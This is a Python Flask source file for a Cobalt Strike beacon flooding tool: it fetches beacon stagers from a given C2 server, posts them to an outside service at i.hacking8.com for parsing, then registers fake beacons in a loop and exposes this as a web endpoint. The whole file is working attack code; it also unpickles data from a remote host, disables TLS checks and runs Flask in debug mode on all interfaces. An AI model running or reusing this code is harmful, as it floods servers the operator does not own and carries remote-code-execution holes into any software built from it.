1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172
| import os from flask import Flask, jsonify, render_template, request, url_for, send_from_directory from werkzeug.utils import secure_filename import argparse import base64 import hashlib import json import os import pickle import re import ssl import subprocess import tempfile import zipfile from urllib.parse import urlencode from urllib.parse import urljoin
import urllib3
app = Flask(__name__) EMPTY_UA_HEADERS = {} URL_PATHS = {}
http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE) EMPTY_UA_HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"} URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}
IS_SERVERLESS = bool(os.environ.get('SERVERLESS')) print(IS_SERVERLESS) urllib3.disable_warnings()
def get_beacon_data(url, arch) -> bytes: http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE) EMPTY_UA_HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"} URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'} full_url = urljoin(url, URL_PATHS[arch]) r = http.request('get', full_url, headers=EMPTY_UA_HEADERS, timeout=30) if r.status != 200: raise Exception("读取beacon失败..") buf = r.data return buf
def _parse_beacon_data(buf: bytes): http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE) EMPTY_UA_HEADERS = {"User-Agent": ""} URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'} b64 = base64.b64encode(buf).decode() data = { "buf": b64 } api = "<https://i.hacking8.com/cobaltspam>" resp = http.request("POST", api, fields=data) if resp.status != 200: raise Exception("解析beacon数据失败") resp = resp.data.decode() resp = json.loads(resp) if resp["status"] == "error": raise Exception(resp["msg"]) resp = base64.b64decode(resp["conf"]) conf = pickle.loads(resp) return conf
def _register_beacon(a, b): http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE) EMPTY_UA_HEADERS = {"User-Agent": ""} URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'} b64 = base64.b64encode(a).decode() b = json.dumps(b)
data = { "pubkey": b64, "meta": b } api = "<https://i.hacking8.com/cobaltspam>" resp = http.request("POST", api, fields=data) if resp.status != 200: raise Exception("生成数据失败") resp = resp.data.decode() resp = json.loads(resp) c = resp["conf"] c = base64.b64decode(c) r = pickle.loads(c) return r
def C2Server(url, option): res_info = [] http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE) EMPTY_UA_HEADERS = {"User-Agent": ""} URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'} only_print = option == 1 batch_size = option
x86_beacon_buf = get_beacon_data(url, 'x86') ret = _parse_beacon_data(x86_beacon_buf) if not ret: x64_beacon_buf = get_beacon_data(url, 'x64') ret = _parse_beacon_data(x64_beacon_buf) if not ret: raise Exception conf = ret["conf"] print("获取Beacon信息成功!") for k, v in conf.items(): print(k, ":", v) if only_print: return if conf['BeaconType'][0] == 'HTTP' or conf['BeaconType'][0] == 'HTTPS': pass else: print("BeaconType " + str(conf['BeaconType']) + " not yet supported! Quitting.") return index = 1 while 1: r = _register_beacon(conf["PublicKey"], conf["HttpGet_Metadata"]) for body, headers, params in r: if 'HostHeader' in conf: domain = re.search('Host: (.*)$', conf['HostHeader'], re.I) if domain: headers['Host'] = domain.group(1).strip() _u = urljoin( conf['BeaconType'][0] + '://' + conf['C2Server'].split(',')[0] + ':' + str(conf['Port']), conf['C2Server'].split(',')[1]) if params: _u += "?" + urlencode(params) req = http.request("GET", _u, body=body, headers=headers, timeout=30) if req.status == 200: res_info.append('上线成功! index:{}'.format(index)) print('上线成功! index:{}'.format(index)) else: print("上线失败! index:{}".format(index)) index += 1 if index >= batch_size and batch_size < 999: res_info_json = {"info":res_info} return res_info_json
@app.route("/",methods = ["POST","GET"]) def chong(): if request.method == "GET": return "helloword" elif request.method == "POST": data = json.loads(request.data) ipaddress = data['ipaddress'] port = data['port'] option = data['option'] reslist = C2Server("{}:{}".format(str(ipaddress),str(port)), int(option)+1) return jsonify(reslist) else: return "fuck"
app.run(debug=True, port=9000, host='0.0.0.0')
|